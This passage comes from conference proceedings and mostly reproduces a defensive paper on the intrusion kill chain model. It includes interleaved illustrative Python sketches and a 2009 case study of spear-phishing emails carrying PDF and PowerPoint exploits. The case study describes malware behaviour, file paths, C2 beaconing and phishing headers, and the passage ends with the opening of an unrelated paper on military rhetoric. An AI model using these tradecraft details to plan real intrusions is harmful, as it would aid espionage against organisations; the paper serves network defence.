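The closing transition is the point of the model: utilization is not an endpoint but the source of the next generation of indicators.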


This applies to all indicators indiscriminately, regardless of their accuracy or applicability. Tracking the<br />

derivation of a given indicator from its predecessors can be time-consuming and problematic if<br />

sufficient tracking isn’t in place, thus it is imperative that indicators subject to these processes are<br />

valid and applicable to the problem set in question. If attention is not paid to this point, analysts may<br />

find themselves applying these techniques to threat actors for which they were not designed, or to<br />

benign activity altogether.<br />

3.2 Intrusion kill chain<br />

A kill chain is a systematic process to target and engage an adversary to create desired effects. U.S.<br />

military targeting doctrine defines the steps of this process as find, fix, track, target, engage, assess<br />

(F2T2EA): find adversary targets suitable for engagement; fix their location; track and observe; target<br />

with suitable weapon or asset to create desired effects; engage adversary; assess effects (U.S.<br />

Department of Defense, 2007). This is an integrated, end-to-end process described as a “chain”<br />

because any one deficiency will interrupt the entire process.<br />

Expanding on this concept, this paper presents a new kill chain model, one specifically for intrusions.<br />

The essence of an intrusion is that the aggressor must develop a payload to breach a trusted<br />

boundary, establish a presence inside a trusted environment, and from that presence, take actions<br />

towards their objectives, be they moving laterally inside the environment or violating the<br />

confidentiality, integrity, or availability of a system in the environment. The intrusion kill chain is<br />

defined as reconnaissance, weaponization, delivery, exploitation, installation, command and control<br />

(C2), and actions on objectives.<br />

With respect to computer network attack (CNA) or computer network espionage (CNE), the definitions<br />

for these kill chain phases are as follows:<br />

Reconnaissance - Research, identification and selection of targets, often represented as crawling<br />

Internet websites such as conference proceedings and mailing lists for email addresses, social<br />

relationships, or information on specific technologies.<br />

Weaponization - Coupling a remote access trojan with an exploit into a deliverable payload,<br />

typically by means of an automated tool (weaponizer). Increasingly, client application data files<br />

such as Adobe Portable Document Format (PDF) or Microsoft Office documents serve as the<br />

weaponized deliverable.<br />

Delivery - Transmission of the weapon to the targeted environment. The three most prevalent<br />

delivery vectors for weaponized payloads by APT actors, as observed by the Lockheed Martin<br />

Computer Incident Response Team (LM-CIRT) for the years 2004-2010, are email attachments,<br />

websites, and USB removable media.<br />

Exploitation - After the weapon is delivered to victim host, exploitation triggers intruders’ code.<br />

Most often, exploitation targets an application or operating system vulnerability, but it could also<br />

more simply exploit the users themselves or leverage an operating system feature that autoexecutes<br />

code.<br />

Installation - Installation of a remote access trojan or backdoor on the victim system allows the<br />

adversary to maintain persistence inside the environment.<br />

Command and Control (C2) - Typically, compromised hosts must beacon outbound to an Internet<br />

controller server to establish a C2 channel. APT malware especially requires manual interaction<br />

rather than conducting activity automatically. Once the C2 channel is established, intruders have<br />

“hands on the keyboard” access inside the target environment.<br />

Actions on Objectives - Only now, after progressing through the first six phases, can intruders<br />

take actions to achieve their original objectives. Typically, this objective is data exfiltration, which<br />

involves collecting, encrypting and extracting information from the victim environment; violations<br />

of data integrity or availability are potential objectives as well. Alternatively, the intruders may only<br />

desire access to the initial victim box for use as a hop point to compromise additional systems<br />

and move laterally inside the network.<br />

3.3 Courses of action<br />

The intrusion kill chain becomes a model for actionable intelligence when defenders align enterprise<br />

defensive capabilities to the specific processes an adversary undertakes to target that enterprise.<br />



Eric Hutchins et al.<br />

Defenders can measure the performance as well as the effectiveness of these actions, and plan<br />

investment roadmaps to rectify any capability gaps. Fundamentally, this approach is the essence of<br />

intelligence-driven CND: basing security decisions and measurements on a keen understanding of the<br />

adversary.<br />

Table 1 depicts a course of action matrix using the actions of detect, deny, disrupt, degrade, deceive,<br />

and destroy from DoD information operations (IO) doctrine (U.S. Department of Defense, 2006). This<br />

matrix depicts, for example, that in the exploitation phase host intrusion detection systems (HIDS) can<br />

passively detect exploits, patching denies exploitation altogether, and data execution prevention<br />

(DEP) can disrupt the exploit once it initiates. Illustrating the spectrum of capabilities defenders can<br />

employ, the matrix includes traditional systems like network intrusion detection systems (NIDS) and<br />

firewall access control lists (ACL), system hardening best practices like audit logging, but also vigilant<br />

users themselves who can detect suspicious activity.<br />

Table 1: Courses of action matrix<br />
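The course of action matrix can be sketched as a simple lookup structure. In the following Python sketch (ours, not the authors'), the exploitation-phase cells follow the text above (HIDS detects, patching denies, DEP disrupts); the remaining cells are purely illustrative placeholders, and a gap query identifies candidate cells for investment:<br />

```python
# The six defensive actions from DoD IO doctrine.
ACTIONS = ["detect", "deny", "disrupt", "degrade", "deceive", "destroy"]

# Capability mapped to each (phase, action) cell; missing cells are gaps.
# Only the exploitation row reflects the paper; other cells are illustrative.
matrix = {
    "delivery":     {"detect": "vigilant user", "deny": "proxy filter"},
    "exploitation": {"detect": "HIDS", "deny": "patch", "disrupt": "DEP"},
    "c2":           {"detect": "NIDS", "deny": "firewall ACL"},
}

def capability_gaps(matrix, actions=ACTIONS):
    """(phase, action) cells with no defensive capability in place."""
    return [(phase, action)
            for phase, cells in matrix.items()
            for action in actions
            if action not in cells]
```

Enumerating `capability_gaps(matrix)` then yields the empty cells of the matrix, which is exactly the input an investment roadmap needs.<br />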

Here, completeness equates to resiliency, which is the defender’s primary goal when faced with<br />

persistent adversaries that continually adapt their operations over time. The most notable adaptations<br />

are exploits, particularly previously undisclosed “zero-day” exploits. Security vendors call these “zero-day<br />

attacks,” and tout “zero day protection”. This myopic focus fails to appreciate that the exploit is<br />

but one change in a broader process. If intruders deploy a zero-day exploit but reuse observable tools<br />

or infrastructure in other phases, that major improvement is fruitless if the defenders have mitigations<br />

for the repeated indicators. This repetition demonstrates that a defensive strategy of complete indicator<br />

utilization achieves resiliency and forces the adversary to make more difficult and comprehensive<br />

adjustments to achieve their objectives. In this way, the defender increases the adversary’s cost of<br />

executing successful intrusions.<br />

Defenders can generate metrics of this resiliency by measuring the performance and effectiveness of<br />

defensive actions against the intruders. Consider an example series of intrusion attempts from a<br />

single APT campaign that occur over a seven month timeframe, shown in Figure 2. For each phase of<br />

the kill chain, a white diamond indicates relevant, but passive, detections were in place at the time of<br />

that month’s intrusion attempt, a black diamond indicates relevant mitigations were in place, and an<br />

empty cell indicates no relevant capabilities were available. After each intrusion, analysts leverage<br />

newly revealed indicators to update their defenses, as shown by the gray arrows. The illustration<br />

shows, foremost, that at least one mitigation was in place for all three intrusion attempts, thus<br />

mitigations were successful. However, it also clearly shows significant differences in each month. In<br />

December, defenders detect the weaponization and block the delivery but uncover a brand new,<br />


unmitigated, zero-day exploit in the process. In March, the adversary re-uses the same exploit, but<br />

evolves the weaponization technique and delivery infrastructure, circumventing detection and<br />

rendering those defensive systems ineffective. By June, the defenders updated their capabilities<br />

sufficiently to have detections and mitigations layered from weaponization to C2. By framing metrics<br />

in the context of the kill chain, defenders had the proper perspective of the relative effect of their<br />

defenses against the intrusion attempts and where there were gaps to prioritize remediation.<br />

Figure 2: Illustration of the relative effectiveness of defenses against subsequent intrusion attempts<br />
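The per-attempt coverage depicted in Figure 2 can be tabulated in a small structure and measured directly. In this sketch (ours; the phase values are illustrative reconstructions from the narrative, not the figure's actual data), each phase records no capability (`None`), a passive detection, or a mitigation:<br />

```python
# None = no capability, "detect" = passive detection, "mitigate" = mitigation.
attempts = {
    "December": {"weaponization": "detect", "delivery": "mitigate",
                 "exploitation": None},
    "March":    {"weaponization": None, "delivery": None,
                 "installation": "mitigate"},
    "June":     {"weaponization": "mitigate", "delivery": "mitigate",
                 "c2": "detect"},
}

def was_mitigated(attempt):
    """True if at least one phase had a mitigation in place."""
    return any(v == "mitigate" for v in attempt.values())

def coverage(attempt):
    """Fraction of phases with any capability (detect or mitigate)."""
    return sum(v is not None for v in attempt.values()) / len(attempt)
```

Checking `was_mitigated` over all attempts captures the figure's headline result, while `coverage` exposes the month-to-month differences in defensive depth.<br />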

3.4 Intrusion reconstruction<br />

Kill chain analysis is a guide for analysts to understand what information is, and may be, available for<br />

defensive courses of action. It is a model to analyze the intrusions in a new way. Most detected<br />

intrusions will provide a limited set of attributes about a single phase of an intrusion. Analysts must<br />

still discover many other attributes for each phase to enumerate the maximum set of options for<br />

courses of action. Further, based on detection in a given phase, analysts can assume that prior<br />

phases of the intrusion have already executed successfully.<br />
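The ordering assumption above can be made concrete in a short sketch (ours, not part of the original paper): representing the kill chain as an ordered sequence, a detection at any phase implies every earlier phase has already succeeded.<br />

```python
# The seven kill chain phases, in the order defined in Section 3.
KILL_CHAIN = [
    "reconnaissance", "weaponization", "delivery", "exploitation",
    "installation", "command_and_control", "actions_on_objectives",
]

def assumed_completed(detected_phase):
    """Phases an analyst can assume already executed successfully,
    given a detection at detected_phase."""
    return KILL_CHAIN[: KILL_CHAIN.index(detected_phase) + 1]
```

For example, a detection during command and control implies the six phases up to and including C2 have already run, and each of those phases is a candidate for further indicator discovery.<br />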

Only through complete analysis of prior phases, as shown in Figure 3, can actions be taken at those<br />

phases to mitigate future intrusions. If one cannot reproduce the delivery phase of an intrusion, one<br />

cannot hope to act on the delivery phase of subsequent intrusions from the same adversary. The<br />

conventional incident response process initiates after the exploit phase, illustrating the self-fulfilling<br />

prophecy that defenders are inherently disadvantaged and inevitably too late. The inability to fully<br />

reconstruct all intrusion phases prioritizes tools, technologies, and processes to fill this gap.<br />

Figure 3: Late phase detection<br />

Defenders must be able to move their detection and analysis up the kill chain and more importantly to<br />

implement courses of action across the kill chain. In order for an intrusion to be economical,<br />

adversaries must re-use tools and infrastructure. By completely understanding an intrusion, and<br />

leveraging intelligence on these tools and infrastructure, defenders force an adversary to change<br />

every phase of their intrusion in order to successfully achieve their goals in subsequent intrusions. In<br />

this way, network defenders use the persistence of adversaries’ intrusions against them to achieve a<br />

level of resilience.<br />


Equally as important as thorough analysis of successful compromises is synthesis of unsuccessful<br />

intrusions. As defenders collect data on adversaries, they will push detection from the latter phases of<br />

the kill chain into earlier ones. Detection and prevention at pre-compromise phases also necessitates<br />

a response. Defenders must collect as much information on the mitigated intrusion as possible, so<br />

that they may synthesize what might have happened should future intrusions circumvent the currently<br />

effective protections and detections (see Figure 4). For example, if a targeted malicious email is<br />

blocked due to re-use of a known indicator, synthesis of the remaining kill chain might reveal a new<br />

exploit or backdoor contained therein. Without this knowledge, future intrusions, delivered by different<br />

means, may go undetected. If defenders implement countermeasures faster than their known<br />

adversaries evolve, they maintain a tactical advantage.<br />

Figure 4: Earlier phase detection<br />

3.5 Campaign analysis<br />

At a strategic level, analyzing multiple intrusion kill chains over time will identify commonalities and<br />

overlapping indicators. Figure 5 illustrates how highly-dimensional correlation between two intrusions<br />

through multiple kill chain phases can be identified. Through this process, defenders will recognize<br />

and define intrusion campaigns, linking together perhaps years of activity from a particular persistent<br />

threat. The most consistent indicators, the campaign’s key indicators, provide centers of gravity for<br />

defenders to prioritize development and use of courses of action. Figure 6 shows how intrusions may<br />

have varying degrees of correlation, but the inflection points where indicators most frequently align<br />

identify these key indicators. These less volatile indicators can be expected to remain consistent,<br />

predicting the characteristics of future intrusions with greater confidence the more frequently they are<br />

observed. In this way, an adversary’s persistence becomes a liability which the defender can leverage<br />

to strengthen its posture.<br />
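This correlation across kill chain phases can be sketched as a per-phase set intersection (our illustration; the sample indicator values echo the case study in Section 4, with the intrusion 3 sender address omitted because it is redacted in the source):<br />

```python
def shared_indicators(a, b):
    """Per-phase indicators two intrusions have in common."""
    return {phase: a[phase] & b[phase]
            for phase in a.keys() & b.keys()
            if a[phase] & b[phase]}

intrusion_2 = {"delivery": {"dn...etto@yahoo.com", "216.abc.xyz.76"},
               "installation": {"fssm32.exe"}}
intrusion_3 = {"delivery": {"216.abc.xyz.76"},  # new sender address redacted
               "installation": {"fssm32.exe"}}

# Intrusions 2 and 3 overlap on the downstream IP and the installer name.
common = shared_indicators(intrusion_2, intrusion_3)
```

Indicators that recur across many such pairwise comparisons are the stable, low-volatility key indicators that anchor a campaign.<br />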

The principal goal of campaign analysis is to determine the patterns and behaviors of the intruders,<br />

their tactics, techniques, and procedures (TTP), to detect “how” they operate rather than specifically<br />

“what” they do. The defender’s objective is less to positively attribute the identity of the intruders than<br />

to evaluate their capabilities, doctrine, objectives and limitations; intruder attribution, however, may<br />

well be a side product of this level of analysis. As defenders study new intrusion activity, they will<br />

either link it to existing campaigns or perhaps identify a brand new set of behaviors of a theretofore<br />

unknown threat and track it as a new campaign. Defenders can assess their relative defensive<br />

posture on a campaign-by-campaign basis, and based on the assessed risk of each, develop<br />

strategic courses of action to cover any gaps.<br />

Another core objective of campaign analysis is to understand the intruders’ intent. To the extent that<br />

defenders can determine technologies or individuals of interest, they can begin to understand the<br />

adversary’s mission objectives. This necessitates trending intrusions over time to evaluate targeting<br />

patterns and closely examining any data exfiltrated by the intruders. Once again this analysis results<br />

in a roadmap to prioritize highly focused security measures to defend these individuals, networks or<br />

technologies.<br />

4. Case study<br />

To illustrate the benefit of these techniques, a case study observed by the Lockheed Martin Computer<br />

Incident Response Team (LM-CIRT) in March 2009 of three intrusion attempts by an adversary is<br />

considered. Through analysis of the intrusion kill chains and robust indicator maturity, network<br />

defenders successfully detected and mitigated an intrusion leveraging a “zero-day” vulnerability. All<br />

three intrusions leveraged a common APT tactic: targeted malicious email (TME) delivered to a limited<br />

set of individuals, containing a weaponized attachment that installs a backdoor which initiates<br />

outbound communications to a C2 server.<br />

Figure 5: Common indicators between intrusions<br />

Figure 6: Campaign key indicators<br />

4.1 Intrusion attempt 1<br />

On March 3, 2009, LM-CIRT detected a suspicious attachment within an email discussing an<br />

upcoming American Institute of Aeronautics and Astronautics (AIAA) conference. The email claimed<br />

to be from an individual who legitimately worked for AIAA, and was directed to only 5 users, each of<br />

whom had received similar TME in the past. Analysts determined the malicious attachment,<br />

tcnom.pdf, would exploit a known, but unpatched, vulnerability in Adobe Acrobat Portable Document<br />

Format (PDF): CVE-2009-0658, documented by Adobe on February 19, 2009 (Adobe, 2009) but not<br />

patched until March 10, 2009. A copy of the email headers and body follow.<br />

Received: (qmail 71864 invoked by uid 60001); Tue, 03 Mar 2009 15:01:19 +0000<br />

Received: from [60.abc.xyz.215] by web53402.mail.re2.yahoo.com via HTTP; Tue,<br />

03 Mar 2009 07:01:18 -0800 (PST)<br />

Date: Tue, 03 Mar 2009 07:01:18 -0800 (PST)<br />

From: Anne E...<br />

Subject: AIAA Technical Committees<br />

To: [REDACTED]<br />

Reply-to: dn...etto@yahoo.com<br />

Message-id: <br />

MIME-version: 1.0<br />


X-Mailer: YahooMailWebService/0.7.289.1<br />

Content-type: multipart/mixed;<br />

boundary="Boundary_(ID_Hq9CkDZSoSvBMukCRm7rsg)" X-YMail-OSG:<br />

Please submit one copy (photocopies are acceptable) of this form, and<br />

one copy of nominee’s resume to: AIAA Technical Committee<br />

Nominations,<br />

1801 Alexander Bell Drive, Reston, VA 20191. Fax number is 703/264-<br />

7551. Form can also be submitted via our web site at www.aiaa.org, Inside<br />

AIAA, Technical Committees<br />

Within the weaponized PDF were two other files, a benign PDF and a Portable Executable (PE)<br />

backdoor installation file. These files, in the process of weaponization, were encrypted using a trivial<br />

algorithm with an 8-bit key stored in the exploit shellcode. Upon opening the PDF, shellcode exploiting<br />

CVE-2009-0658 would decrypt the installation binary, place it on disk as C:\Documents and<br />

Settings\[username]\Local Settings\fssm32.exe, and invoke it. The shellcode would also extract the<br />

benign PDF and display it to the user. Analysts discovered that the benign PDF was an identical copy<br />

of one published on the AIAA website at http://www.aiaa.org/pdf/inside/tcnom.pdf, revealing adversary<br />

reconnaissance actions.<br />
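The paper describes the weaponization scheme only as a “trivial algorithm with an 8-bit key” stored in the shellcode. Single-byte XOR is one common example of such a scheme; treating it as XOR here is an assumption on our part, not a detail from the analysis. A minimal sketch:<br />

```python
def xor_8bit(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR; the operation is its own inverse."""
    return bytes(b ^ key for b in data)

# 'Encrypting' an example PE header and applying the same key recovers it,
# mirroring how shellcode could decrypt an embedded installer in place.
ciphertext = xor_8bit(b"MZ\x90\x00", 0x4A)
assert xor_8bit(ciphertext, 0x4A) == b"MZ\x90\x00"
```

Because the key space is only 256 values, an analyst who recovers the weaponized file can also brute-force such a scheme trivially, which is one reason weaponizer artifacts make durable indicators.<br />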

The installer fssm32.exe would extract the backdoor components embedded within itself, saving EXE<br />

and HLP files as C:\Program Files\Internet Explorer\IEUpd.exe and IEXPLORE.hlp. Once active, the<br />

backdoor would send heartbeat data to the C2 server 202.abc.xyz.7 via valid HTTP requests. Table 2<br />

articulates the identified, relevant indicators per phase. Due to successful mitigations, the adversary<br />

never took actions on objectives, therefore that phase is marked “N/A.”<br />

Table 2: Intrusion attempt 1 indicators<br />

4.2 Intrusion attempt 2<br />

One day later, another TME intrusion attempt was executed. Analysts would identify substantially<br />

similar characteristics and link this and the previous day’s attempt to a common campaign, but<br />

analysts also noted a number of differences. The repeated characteristics enabled defenders to block<br />

this activity, while the new characteristics provided analysts additional intelligence to build resiliency<br />

with further detection and mitigation courses of action.<br />

Received: (qmail 97721 invoked by uid 60001); 4 Mar 2009 14:35:22 -0000<br />


Message-ID: <br />

Received: from [216.abc.xyz.76] by web53411.mail.re2.yahoo.com via HTTP; Wed,<br />

04 Mar 2009 06:35:20 PST<br />

X-Mailer: YahooMailWebService/0.7.289.1<br />

Date: Wed, 4 Mar 2009 06:35:20 -0800 (PST)<br />

From: Anne E... <br />

Reply-To: dn...etto@yahoo.com<br />

Subject: 7th Annual U.S. Missile Defense <strong>Conference</strong><br />

To: [REDACTED]<br />

MIME-Version: 1.0<br />

Content-Type: multipart/mixed; boundary="0-760892832-1236177320=:97248"<br />

Welcome to the 7th Annual U.S. Missile Defense <strong>Conference</strong><br />

The sending email address was common to the March 3 and March 4 activity, but the subject matter,<br />

recipient list, attachment name, and most importantly, the downstream IP address (216.abc.xyz.76)<br />

differed. Analysis of the attached PDF, MDA_Prelim_2.pdf, revealed an identical weaponization<br />

encryption algorithm and key, as well as identical shellcode to exploit the same vulnerability. The PE<br />

installer in the PDF was identical to that used the previous day, and the benign PDF was once again<br />

an identical copy of a file on AIAA’s website<br />

(http://www.aiaa.org/events/missiledefense/MDA_Prelim_09.pdf). The adversary never took actions<br />

towards its objectives, therefore that phase is again marked “N/A.” A summary of indicators from the<br />

first two intrusion attempts is provided in Table 3.<br />

Table 3: Intrusion attempts 1 and 2 indicators<br />

4.3 Intrusion attempt 3<br />

Over two weeks later, on March 23, 2009, a significantly different intrusion was identified due to<br />

indicator overlap, though minimal, with Intrusions 1 and 2. This email contained a PowerPoint file<br />

which exploited a vulnerability that was not, until that moment, known to the vendor or network<br />

defenders. The vulnerability was publicly acknowledged 10 days later by Microsoft as security<br />

advisory 969136 and identified as CVE-2009-0556 (Microsoft, 2009b). Microsoft issued a patch on<br />

May 12, 2009 (Microsoft, 2009a). In this campaign, the adversary made a significant shift by using a<br />

brand new “zero-day” exploit. Details of the email follow.<br />

Received: (qmail 62698 invoked by uid 1000); Mon, 23 Mar 2009 17:14:22 +0000<br />


Received: (qmail 82085 invoked by uid 60001); Mon, 23 Mar 2009 17:14:21 +0000<br />

Received: from [216.abc.xyz.76] by web43406.mail.sp1.yahoo.com via HTTP; Mon,<br />

23 Mar 2009 10:14:21 -0700 (PDT)<br />

Date: Mon, 23 Mar 2009 10:14:21 -0700 (PDT)<br />

From: Ginette C... <br />

Subject: Celebrities Without Makeup<br />

To: [REDACTED]<br />

Message-id: <br />

MIME-version: 1.0<br />

X-Mailer: YahooMailClassic/5.1.20 YahooMailWebService/0.7.289.1<br />

Content-type: multipart/mixed; boundary="Boundary_(ID_DpBDtBoPTQ1DnYXw29L2Ng)"<br />

<br />

This email contained a new sending address, new recipient list, markedly different benign content<br />

displayed to the user (from “missile defense” to “celebrity makeup”), and the malicious PowerPoint<br />

attachment contained a completely new exploit. However, the adversaries used the same<br />

downstream IP address, 216.abc.xyz.76, to connect to the webmail service as they used in Intrusion<br />

2. The PowerPoint file was weaponized using the same algorithm as the previous two intrusions, but<br />

with a different 8-bit key. The PE installer and backdoor were found to be identical to the previous two<br />

intrusions. A summary of indicators from all three intrusions is provided in Table 4.<br />

Table 4: Intrusion attempts 1, 2, and 3 indicators<br />

Leveraging intelligence on adversaries at the first intrusion attempt enabled network defenders to<br />

prevent a known zero-day exploit. With each consecutive intrusion attempt, through complete<br />

analysis, more indicators were discovered. A robust set of courses of action enabled defenders to<br />

mitigate subsequent intrusions upon delivery, even when adversaries deployed a previously-unseen<br />

exploit. Further, through this diligent approach, defenders forced the adversary to avoid all mature<br />

indicators to successfully launch an intrusion from that point forward.<br />

Following conventional incident response methodology may have been effective in managing systems<br />

compromised by these intrusions in environments completely under the control of network defenders.<br />

However, this would not have mitigated the damage done by a compromised mobile asset that moved<br />

out of the protected environment. Additionally, by only focusing on post-compromise effects (those<br />

after the Exploit phase), fewer indicators are available. Simply using a different backdoor and installer<br />

would circumvent available detections and mitigations, enabling adversary success. By preventing<br />


compromise in the first place, the resultant risk is reduced in a way unachievable through the<br />

conventional incident response process.<br />

5. Summary<br />

Intelligence-driven computer network defense is a necessity in light of advanced persistent threats. As<br />

conventional, vulnerability-focused processes are insufficient, understanding the threat itself, its<br />

intent, capability, doctrine, and patterns of operation is required to establish resilience. The intrusion<br />

kill chain provides a structure to analyze intrusions, extract indicators and drive defensive courses of<br />

actions. Furthermore, this model prioritizes investment for capability gaps, and serves as a framework<br />

to measure the effectiveness of the defenders’ actions. When defenders consider the threat<br />

component of risk to build resilience against APTs, they can turn the persistence of these actors into a<br />

liability, decreasing the adversary’s likelihood of success with each intrusion attempt.<br />

The kill chain shows an asymmetry between aggressor and defender: any one repeated component<br />

by the aggressor is a liability. Understanding the nature of repetition for given adversaries, be it out of<br />

convenience, personal preference, or ignorance, is an analysis of cost. Modeling the cost-benefit ratio<br />

to intruders is an area for additional research. When that cost-benefit is decidedly imbalanced, it is<br />

perhaps an indicator of information superiority of one group over the other. Models of information<br />

superiority may be valuable for computer network attack and exploitation doctrine development.<br />

Finally, this paper presents an intrusion kill chain model in the context of computer espionage.<br />

Intrusions may represent a broader problem class. This research may strongly overlap with other<br />

disciplines, such as IED countermeasures.<br />

References<br />

Adobe. APSA09-01: Security Updates available for Adobe Reader and Acrobat versions 9 and earlier, February<br />

2009. URL http://www.adobe.com/support/security/advisories/apsa09-01.html.<br />

Duran, F., Conrad, S. H., Conrad, G. N., Duggan, D. P. and Held, E. B. Building A System For Insider Security. IEEE<br />

Security & Privacy, 7(6):30–38, 2009. doi: 10.1109/MSP.2009.111.<br />

Epstein, Keith, and Elgin, Ben. Network Security Breaches Plague NASA, November 2008. URL<br />

http://www.businessweek.com/print/magazine/content/08_48/b4110072404167.htm.<br />

Hayes, Ashton (LTC). Defending Against the Unknown: Antiterrorism and the Terrorist Planning Cycle. The<br />

Guardian, 10(1):32–36, 2008. URL http://www.jcs.mil/content/files/2009-04/041309155243_ spring2008.pdf.<br />

Krekel, Bryan. Capability of the People’s Republic of China to Conduct Cyber Warfare and Computer Network<br />

Exploitation, October 2009. URL http://www.uscc.gov/researchpapers/2009/NorthropGrumman_<br />

PRC_Cyber_Paper_FINAL_Approved%20Report_16Oct2009.pdf.<br />

Lewis, James Andrew. Holistic Approaches to Cybersecurity to Enable Network Centric Operations, April 2008.<br />

URL http://armedservices.house.gov/pdfs/TUTC040108/Lewis_Testimony040108.pdf.<br />

Mandiant. M-Trends: The Advanced Persistent Threat, January 2010. URL<br />

http://www.mandiant.com/products/services/m-trends.<br />

Microsoft. Microsoft Security Bulletin MS09-017: Vulnerabilities in Microsoft Office PowerPoint Could Allow<br />

Remote Code Execution (967340), May 2009a. URL http://www.microsoft.com/technet/security/<br />

bulletin/ms09-017.mspx.<br />

Microsoft. Microsoft Security Advisory (969136): Vulnerability in Microsoft Office PowerPoint Could Allow Remote<br />

Code Execution, April 2009b. URL http://www.microsoft.com/technet/security/advisory/969136.mspx.<br />

Mitropoulos, Sarandis, Patsos, Dimitrios, and Douligeris, Christos. On Incident Handling and Response: A state-of-the-art<br />

approach. Computers & Security, 5:351–370, July 2006. URL<br />

http://dx.doi.org/10.1016/j.cose.2005.09.006.<br />

National Institute of Standards and Technology. Special Publication 800-61: Computer Security Incident Handling<br />

Guide, March 2008. URL http://csrc.nist.gov/publications/PubsSPs.html.<br />

National Research Council. Countering the Threat of Improvised Explosive Devices: Basic Research<br />

Opportunities (Abbreviated Version), 2007. URL http://books.nap.edu/catalog.php?record_id=11953.<br />

Sakuraba, T., Domyo, S., Chou, B.-H. and Sakurai, K. Exploring Security Countermeasures along the Attack<br />

Sequence. In Proc. Int. Conf. Information Security and Assurance ISA 2008, pages 427–432, 2008.<br />

doi:10.1109/ISA.2008.112.<br />

Stamos, Alex. “Aurora” Response Recommendations, February 2010. URL https://www.isecpartners.<br />

com/files/iSEC_Aurora_Response_Recommendations.pdf.<br />

Tirpak, John A. Find, Fix, Track, Target, Engage, Assess. Air Force Magazine, 83:24–29, 2000. URL<br />

http://www.airforce-magazine.com/MagazineArchive/Pages/2000/July%202000/0700find.aspx.<br />

UK-NISCC. National Infrastructure Security Co-ordination Centre: Targeted Trojan Email Attacks, June 2005.<br />

URL https://www.cpni.gov.uk/docs/ttea.pdf.<br />

United States Army Training and Doctrine Command. A Military Guide to Terrorism in the Twenty-First Century,<br />

August 2007. URL http://www.dtic.mil/srch/doc?collection=t3&id=ADA472623.<br />

US-CERT. Technical Cyber Security Alert TA05-189A: Targeted Trojan Email Attacks, July 2005. URL<br />

http://www.us-cert.gov/cas/techalerts/TA05-189A.html.<br />


U.S.-China Economic and Security Review Commission. 2008 Report to Congress of the U.S. China Economic<br />

and Security Review Commission, November 2008. URL http://www.uscc.gov/annual_report/2008/<br />

annual_report_full_08.pdf.<br />

U.S.-China Economic and Security Review Commission. 2009 Report to Congress of the U.S.-China Economic<br />

and Security Review Commission, November 2009. URL http://www.uscc.gov/annual_report/2009/<br />

annual_report_full_09.pdf.<br />

U.S. Department of Defense. Joint Publication 3-13 Information Operations, February 2006. URL<br />

http://www.dtic.mil/doctrine/new_pubs/jp3_13.pdf.<br />

U.S. Department of Defense. Joint Publication 3-60 Joint Targeting, April 2007. URL http://www.dtic.<br />

mil/doctrine/new_pubs/jp3_60.pdf.<br />

Willison, Robert and Siponen, Mikko. Overcoming the insider: reducing employee computer crime through<br />

Situational Crime Prevention. Communications of the ACM, 52(9):133–137, 2009. doi: http://doi.acm.<br />

org/10.1145/1562164.1562198.<br />



The Hidden Grand Narrative of Western Military Policy: A<br />

Linguistic Analysis of American Strategic Communication<br />

Saara Jantunen and Aki-Mauri Huhtinen<br />

National Defence University, Helsinki, Finland<br />

sijantunen@gmail.com<br />

aki.huhtinen@mil.fi<br />

Abstract: War engages civilians in a very different way than is traditionally understood. The military-industrial<br />

complex has rooted itself permanently into the civilian world. In the US, recruiters have long operated in<br />

university campuses, the Pentagon has funded the entertainment industry for decades, and the current trend in<br />

most militaries is to advertise military careers that are less about war and more about individual expertise in<br />

civilian professions. The key place for military recruiting is shopping malls, where teenagers can play war games<br />

and enlist. Strategic communication has replaced information warfare. In a complex world, strategic<br />

communication exploits all possible media. As the art of war has been replaced by science, the representations of<br />

war and the role of the military have changed. Both war and military forces are now associated with binary roles:<br />

destruction and humanity, killing and liberating. The logic behind 'bombing for peace' is encoded in the Grand<br />

Military Narrative. This narrative is hidden in American (and NATO) strategies such as Effects Based Operations,<br />

which rely heavily on technology. As people aim to rationalize the world with technology, they fail to take into<br />

account the uncertainty it brings. In warfare, that uncertainty is verbalized as “friendly fire”, “collateral damage” or<br />

simply as “accident”. Success and failure are up to technology. Technology is no longer a tool, but an ideology<br />

and an actor that not only 'enables' the military to take action, but frees it of responsibility. This article analyzes<br />

American strategy discourse and the standard and trends of rhetoric they create. The article focuses on<br />

pinpointing some of the linguistic choices and discourses that define the so-called 'techno-speak', the product of<br />

modern techno-ideology. These discourses result in representations of techno-centered binary values, which<br />

steer military strategy and foreign policy.<br />

Keywords: military-industrial complex, revolution in military affairs, effects based operations, discourse analysis,<br />

military technology<br />

1. The grand military narrative<br />

"You want to hit only the guy you want, not the school bus three cars back", says Steve Felix of the<br />

Naval Air Warfare Center (Matthews, 2010). "The bad guys are figuring out how to hide out in homes<br />

and near schools. We can't go in and drop large bombs - that just doesn't work any more", explains<br />

Steve Martin, the representative of Lockheed Martin. Raytheon's Griffin, currently deployed in<br />

Predator drones, is a new, lighter and more precise missile type. "The Griffin's maneuverability and<br />

accuracy reduce the risk of 'collateral damage'," says an Army representative. "When you can start<br />

producing a lower ratio of collateral damage, that's how you win this kind of war", notes Anthony<br />

Cordesman of the Center for Strategic and International Studies (Wichner, 2010). No<br />

more 'enemy', but virtuous precision to rid the world of the "bad guys".<br />

In July 2010, the Army Experience Center (AEC) in a Philadelphia mall was getting ready to close its<br />

doors after a successful project. The Center offered visitors information on military careers as well as<br />

video games and simulators (some of which are used to train the troops). The traditional images of<br />

depressing boot camp physical training disappear once the teenagers (13 and older, according to the<br />

AEC) get to show with combat simulators what they have been practicing most of their lives. The<br />

youth, wandering the malls, are the perfect target for recruiters. Because they know gaming, warfare<br />

has to become game-like. Now, the entertainment industry is replacing boot camps. Being good at war is<br />

made easy. Being good at war is about pressing a button: In the Army Experience Center, the<br />

teenagers can "touch and feel and experience what the army is all about", explains one of the<br />

Center's recruiters (thearmyexperience, 2008). High-tech weapons to kill the "bad guys" from a<br />

comfortable distance and virtual simulation create combat experience: Whatever the problem, the<br />

answer lies in technology. This is the Grand Military Narrative.<br />

2. The military-industrial-complex and revolution in military affairs<br />

The military-industrial complex gave birth to the Revolution in Military Affairs. The future of the military<br />

is computers, information networks, and precision-guided munitions (Toffler, 1981, 1993).<br />

Technological advances are used to solve the military and strategic challenges of the U.S. (Shimko,<br />

2010: 213). This revolution, or evolution, is depicted by the Grand Military Narrative.<br />



Saara Jantunen and Aki-Mauri Huhtinen<br />

RMA's focus on technology has led to technology-centered strategies and doctrines. Technology<br />

offers the option of unmanned war, to “bring knowledge forward” for the people whose observation is<br />

